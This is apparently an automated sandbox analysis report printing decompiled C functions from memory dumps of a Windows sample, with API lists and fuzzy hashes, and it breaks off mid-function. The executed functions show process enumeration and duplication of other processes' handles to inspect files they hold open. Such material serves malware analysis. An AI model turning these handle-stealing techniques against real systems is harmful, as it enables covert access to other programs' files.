                                                                                                                                                      				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
                                                                                                                                                      				_t9 = _v8 + 2; // 0x2
                                                                                                                                                      				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);
                                                                                                                                                      				_t13 = _v8 + 2; // 0x2
                                                                                                                                                      				E1000CF20(__edi, _v16, 0, _v8 + _t13);
                                                                                                                                                      				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
                                                                                                                                                      				_v16[_v8] = 0;
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A381
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                      • _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 745779501-0
                                                                                                                                                      • Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
                                                                                                                                                      • Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F570() {
                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                      				struct _SYSTEMTIME _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                      				struct _SYSTEMTIME _v52;
                                                                                                                                                      				struct _FILETIME _v60;
                                                                                                                                                      				intOrPtr _t31;
                                                                                                                                                      
                                                                                                                                                      				_v28.wYear = 0x7b2;
                                                                                                                                                      				_v28.wMonth = 1;
                                                                                                                                                      				_v28.wDay = 1;
                                                                                                                                                      				_v28.wHour = 0;
                                                                                                                                                      				_v28.wMinute = 0;
                                                                                                                                                      				_v28.wSecond = 0;
                                                                                                                                                      				_v28.wMilliseconds = 0;
                                                                                                                                                      				GetSystemTime( &_v52);
                                                                                                                                                      				SystemTimeToFileTime( &_v52,  &_v12);
                                                                                                                                                      				SystemTimeToFileTime( &_v28,  &_v60);
                                                                                                                                                      				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                      				asm("sbb eax, [ebp-0x34]");
                                                                                                                                                      				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0);
                                                                                                                                                      				_v32 = _t31;
                                                                                                                                                      				return _v36;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 1001F5A4
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F5DB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3735792614-0
                                                                                                                                                      • Opcode ID: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                      • Instruction ID: fa02b7a9fed9572687d28a8f87146f07c02dbb090ec293c5d85fe2b1344f7672
                                                                                                                                                      • Opcode Fuzzy Hash: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                      • Instruction Fuzzy Hash: 9301E575D1021DAADB00DFE4C8899EEB7B8FF04304F109649E904A7250E779A64ACBA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A0F0(CHAR* _a4) {
                                                                                                                                                      				struct _SECURITY_DESCRIPTOR _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				struct _SECURITY_ATTRIBUTES _v40;
                                                                                                                                                      				int _v44;
                                                                                                                                                      
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				InitializeSecurityDescriptor( &_v24, 1);
                                                                                                                                                      				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
                                                                                                                                                      				_v40.nLength = 0xc;
                                                                                                                                                      				_v40.bInheritHandle = 1;
                                                                                                                                                      				_v40.lpSecurityDescriptor =  &_v24;
                                                                                                                                                      				_v28 = CreateMutexA( &_v40, 0, _a4);
                                                                                                                                                      				if(_v28 != 0 && GetLastError() == 0xb7) {
                                                                                                                                                      					_v44 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _v44;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                      • CreateMutexA.KERNEL32(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001A14D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4085719312-0
                                                                                                                                                      • Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                      • Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
                                                                                                                                                      • Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                      • Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E100026D0(void* __eflags) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v56;
                                                                                                                                                      				char _v84;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                      
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022D98);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t20;
                                                                                                                                                      				E10001160( &_v84, __eflags, "vector<T> too long");
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E10001E70( &_v56,  &_v84);
                                                                                                                                                      				E1000EBEB( &_v56, 0x103307a8);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				_t14 = E100011A0( &_v84);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t14;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMTD ref: 10002706
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10002714
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                      • API String ID: 1843230569-3788999226
                                                                                                                                                      • Opcode ID: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                      • Instruction ID: 1a2e96a28b8215f22a0e790cb2dc9ca4275ca3d727c061adff09d24352fe5d00
                                                                                                                                                      • Opcode Fuzzy Hash: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                      • Instruction Fuzzy Hash: 31F05876804548EBDB14DBD4DD81BEEB778FB047A0F900728F522676C4DB342A05CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				intOrPtr* _t20;
                                                                                                                                                      				intOrPtr* _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __eflags;
                                                                                                                                                      				_push(0x44);
                                                                                                                                                      				E1000F00B(E10022968, __ebx, __edi, __esi);
                                                                                                                                                      				E10001160(_t25 - 0x28, _t27, "invalid string position");
                                                                                                                                                      				_t2 = _t25 - 4;
                                                                                                                                                      				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                      				_t20 = _t25 - 0x50;
                                                                                                                                                      				E10001D90(_t20,  *_t2, _t25 - 0x28);
                                                                                                                                                      				 *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
                                                                                                                                                      				E1000EBEB(_t25 - 0x50, 0x10330158);
                                                                                                                                                      				asm("int3");
                                                                                                                                                      				_push(__esi);
                                                                                                                                                      				_t23 = _t20;
                                                                                                                                                      				E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
                                                                                                                                                      				 *_t23 = 0x100232c8;
                                                                                                                                                      				return _t23;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 10004433
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10004465
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                        • Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13
                                                                                                                                                      Strings
                                                                                                                                                      • invalid string position, xrefs: 10004438
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                      • API String ID: 2977319401-1799206989
                                                                                                                                                      • Opcode ID: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                      • Instruction ID: a56476a32a0c337bfade56aca9773eeef8d3bbd0f37adf4676240551fddf05bf
                                                                                                                                                      • Opcode Fuzzy Hash: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                      • Instruction Fuzzy Hash: 6CE09275800198EBD710DBD4EC41ADEB778EF04390F80881AF605BB20ACBB5A948CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Executed Functions

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v32;
                                                                                                                                                      				char _v40;
                                                                                                                                                      				char _v48;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				char _v576;
                                                                                                                                                      				long _v580;
                                                                                                                                                      				void _v1102;
                                                                                                                                                      				void* _v1104;
                                                                                                                                                      				intOrPtr _v1636;
                                                                                                                                                      				long _v1652;
                                                                                                                                                      				void _v1656;
                                                                                                                                                      				void* _v1660;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				long _t50;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				struct HINSTANCE__* _t69;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      				void* _t72;
                                                                                                                                                      				int _t73;
                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                      				void* _t84;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				void* _t86;
                                                                                                                                                      
                                                                                                                                                      				_t79 = _a4;
                                                                                                                                                      				_t2 = _t79 + 0x2c; // 0x40c800
                                                                                                                                                      				E00403F55(_t2);
                                                                                                                                                      				_t42 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                      				_v12 = _t42;
                                                                                                                                                      				memset( &_v1656, 0, 0x228);
                                                                                                                                                      				_t85 = _t84 + 0xc;
                                                                                                                                                      				_v1660 = 0x22c;
                                                                                                                                                      				Process32FirstW(_v12,  &_v1660); // executed
                                                                                                                                                      				while(Process32NextW(_v12,  &_v1660) != 0) {
                                                                                                                                                      					E0040C997( &_v580);
                                                                                                                                                      					_t50 = _v1652;
                                                                                                                                                      					_v580 = _t50;
                                                                                                                                                      					_v52 = _v1636;
                                                                                                                                                      					_t51 = OpenProcess(0x410, 0, _t50);
                                                                                                                                                      					__eflags = _t51;
                                                                                                                                                      					_v8 = _t51;
                                                                                                                                                      					if(_t51 != 0) {
                                                                                                                                                      						L4:
                                                                                                                                                      						_v1104 = 0;
                                                                                                                                                      						memset( &_v1102, 0, 0x208);
                                                                                                                                                      						_t86 = _t85 + 0xc;
                                                                                                                                                      						E0040D049(_t79, _v8,  &_v1104);
                                                                                                                                                      						__eflags = _v1104;
                                                                                                                                                      						if(_v1104 == 0) {
                                                                                                                                                      							L6:
                                                                                                                                                      							__eflags =  *0x4136ec; // 0x1
                                                                                                                                                      							_v16 = 0x104;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t69 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                      								__eflags = _t69;
                                                                                                                                                      								if(_t69 != 0) {
                                                                                                                                                      									 *0x4136ec = 1;
                                                                                                                                                      									 *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							_t57 =  *0x4136f0;
                                                                                                                                                      							__eflags = _t57;
                                                                                                                                                      							if(_t57 != 0) {
                                                                                                                                                      								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
                                                                                                                                                      							}
                                                                                                                                                      							L11:
                                                                                                                                                      							E0040CAF2( &_v576,  &_v1104);
                                                                                                                                                      							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                                                      							_t85 = _t86 + 0x14;
                                                                                                                                                      							CloseHandle(_v8);
                                                                                                                                                      							_t79 = _a4;
                                                                                                                                                      							L12:
                                                                                                                                                      							_t37 = _t79 + 0x2c; // 0x40c800
                                                                                                                                                      							E0040D0D3(_t37,  &_v580);
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v1104 - 0x3f;
                                                                                                                                                      						if(_v1104 != 0x3f) {
                                                                                                                                                      							goto L11;
                                                                                                                                                      						}
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					_t71 = E004058FB();
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
                                                                                                                                                      					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					_t72 = OpenProcess(0x1000, 0, _v580);
                                                                                                                                                      					__eflags = _t72;
                                                                                                                                                      					_v8 = _t72;
                                                                                                                                                      					if(_t72 == 0) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					goto L4;
                                                                                                                                                      				}
                                                                                                                                                      				_t73 = FindCloseChangeNotification(_v12); // executed
                                                                                                                                                      				return _t73;
                                                                                                                                                      			}

































                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
                                                                                                                                                      • memset.MSVCRT ref: 0040CEC4
                                                                                                                                                      • Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
                                                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
                                                                                                                                                      • memset.MSVCRT ref: 0040CF5C
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
                                                                                                                                                      • QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
                                                                                                                                                      • Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CloseHandleOpenProcess32memset$AddressChangeCreateFindFirstFullImageModuleNameNextNotificationProcQuerySnapshotToolhelp32free
                                                                                                                                                      • String ID: ?$QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                      • API String ID: 299891297-1549906504
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				int _v20;
                                                                                                                                                      				int _v24;
                                                                                                                                                      				int _v28;
                                                                                                                                                      				int _v32;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				int _v44;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				int _v52;
                                                                                                                                                      				char _v56;
                                                                                                                                                      				int _v60;
                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                      				int _v68;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				int _v76;
                                                                                                                                                      				int _v80;
                                                                                                                                                      				int _v84;
                                                                                                                                                      				int _v88;
                                                                                                                                                      				int _v92;
                                                                                                                                                      				int _v96;
                                                                                                                                                      				int _v100;
                                                                                                                                                      				void _v622;
                                                                                                                                                      				short _v624;
                                                                                                                                                      				char _v1616;
                                                                                                                                                      				void _v1623;
                                                                                                                                                      				char _v1624;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t99;
                                                                                                                                                      				long _t101;
                                                                                                                                                      				intOrPtr _t102;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				void* _t111;
                                                                                                                                                      				void* _t114;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				void* _t128;
                                                                                                                                                      				void* _t131;
                                                                                                                                                      				signed char* _t152;
                                                                                                                                                      				void* _t153;
                                                                                                                                                      				void** _t154;
                                                                                                                                                      				void*** _t155;
                                                                                                                                                      				intOrPtr _t158;
                                                                                                                                                      				signed short* _t159;
                                                                                                                                                      				void* _t163;
                                                                                                                                                      				void* _t164;
                                                                                                                                                      				void* _t165;
                                                                                                                                                      
                                                                                                                                                      				_t165 = __eflags;
                                                                                                                                                      				_t155 = __eax;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v624 = 0;
                                                                                                                                                      				memset( &_v622, 0, 0x208);
                                                                                                                                                      				E00405800( &_v624);
                                                                                                                                                      				_t164 = _t163 + 0x10;
                                                                                                                                                      				_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                      				_v12 = _t97;
                                                                                                                                                      				_t99 = E0040C572(_t155, _t165); // executed
                                                                                                                                                      				_v16 = _t99;
                                                                                                                                                      				FindCloseChangeNotification(_v12); // executed
                                                                                                                                                      				_t154 =  *_t155;
                                                                                                                                                      				_t101 = GetCurrentProcessId();
                                                                                                                                                      				if(_v16 == 0) {
                                                                                                                                                      					_t153 =  *_t154;
                                                                                                                                                      					if(_t153 > 0) {
                                                                                                                                                      						_t152 =  &(_t154[2]);
                                                                                                                                                      						do {
                                                                                                                                                      							if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
                                                                                                                                                      								_v32 =  *_t152 & 0x000000ff;
                                                                                                                                                      							}
                                                                                                                                                      							_t152 =  &(_t152[0x10]);
                                                                                                                                                      							_t153 = _t153 - 1;
                                                                                                                                                      							_t170 = _t153;
                                                                                                                                                      						} while (_t153 != 0);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t102 = 0x20;
                                                                                                                                                      				_v64 = _t102;
                                                                                                                                                      				_v48 = _t102;
                                                                                                                                                      				_v72 = 0;
                                                                                                                                                      				_v60 = 0;
                                                                                                                                                      				_v68 = 0;
                                                                                                                                                      				_v56 = 0;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v52 = 0;
                                                                                                                                                      				_v100 = 0;
                                                                                                                                                      				_v96 = 0;
                                                                                                                                                      				_v92 = 0;
                                                                                                                                                      				_v88 = 0;
                                                                                                                                                      				_v84 = 0;
                                                                                                                                                      				_v80 = 0;
                                                                                                                                                      				_v76 = 0;
                                                                                                                                                      				E0040CE93(_t153, _t170,  &_v100); // executed
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				if(_v44 > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						_t110 = E0040C982(_v20,  &_v56);
                                                                                                                                                      						_t36 = _t110 + 4; // 0x4
                                                                                                                                                      						_v12 = _t110;
                                                                                                                                                      						_t111 = E00405888(_t36);
                                                                                                                                                      						_t158 = _a4;
                                                                                                                                                      						_v16 = _t111;
                                                                                                                                                      						_v8 = 0;
                                                                                                                                                      						if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
                                                                                                                                                      							goto L26;
                                                                                                                                                      						} else {
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_t114 = E00406306(_t158, _v8);
                                                                                                                                                      								_push(_v16);
                                                                                                                                                      								_push(_t114);
                                                                                                                                                      								L0040E03E();
                                                                                                                                                      								if(_t114 == 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								_v8 = _v8 + 1;
                                                                                                                                                      								if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L26;
                                                                                                                                                      								}
                                                                                                                                                      								goto L27;
                                                                                                                                                      							}
                                                                                                                                                      							_t116 = OpenProcess(0x40, 0,  *_v12);
                                                                                                                                                      							__eflags = _t116;
                                                                                                                                                      							_v16 = _t116;
                                                                                                                                                      							if(_t116 != 0) {
                                                                                                                                                      								__eflags =  *_t154;
                                                                                                                                                      								_v24 = 0;
                                                                                                                                                      								if( *_t154 > 0) {
                                                                                                                                                      									_t159 =  &(_t154[1]);
                                                                                                                                                      									do {
                                                                                                                                                      										__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
                                                                                                                                                      										if(( *_t159 & 0x0000ffff) !=  *_v12) {
                                                                                                                                                      											goto L21;
                                                                                                                                                      										} else {
                                                                                                                                                      											__eflags = (_t159[2] & 0x000000ff) - _v32;
                                                                                                                                                      											if((_t159[2] & 0x000000ff) != _v32) {
                                                                                                                                                      												goto L21;
                                                                                                                                                      											} else {
                                                                                                                                                      												_v8 = 0;
                                                                                                                                                      												DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed
                                                                                                                                                      												__eflags = _v8;
                                                                                                                                                      												if(_v8 == 0) {
                                                                                                                                                      													goto L21;
                                                                                                                                                      												} else {
                                                                                                                                                      													_v1624 = 0;
                                                                                                                                                      													memset( &_v1623, 0, 0x3e7);
                                                                                                                                                      													_t164 = _t164 + 0xc;
                                                                                                                                                      													_v36 = 0;
                                                                                                                                                      													E0040C41D();
                                                                                                                                                      													_t128 =  *0x4132a8;
                                                                                                                                                      													__eflags = _t128;
                                                                                                                                                      													if(_t128 != 0) {
                                                                                                                                                      														 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36);
                                                                                                                                                      													}
                                                                                                                                                      													CloseHandle(_v8);
                                                                                                                                                      													_v40 = E00405888( &_v1616);
                                                                                                                                                      													_t131 = E00405888(_a8);
                                                                                                                                                      													_push(_t131);
                                                                                                                                                      													_push(_v40);
                                                                                                                                                      													L0040E03E();
                                                                                                                                                      													__eflags = _t131;
                                                                                                                                                      													if(_t131 == 0) {
                                                                                                                                                      														 *_a12 =  *_v12;
                                                                                                                                                      														_v28 = 1;
                                                                                                                                                      														 *_a16 = _t159[3] & 0x0000ffff;
                                                                                                                                                      													} else {
                                                                                                                                                      														goto L21;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										goto L24;
                                                                                                                                                      										L21:
                                                                                                                                                      										_v24 = _v24 + 1;
                                                                                                                                                      										_t159 =  &(_t159[8]);
                                                                                                                                                      										__eflags = _v24 -  *_t154;
                                                                                                                                                      									} while (_v24 <  *_t154);
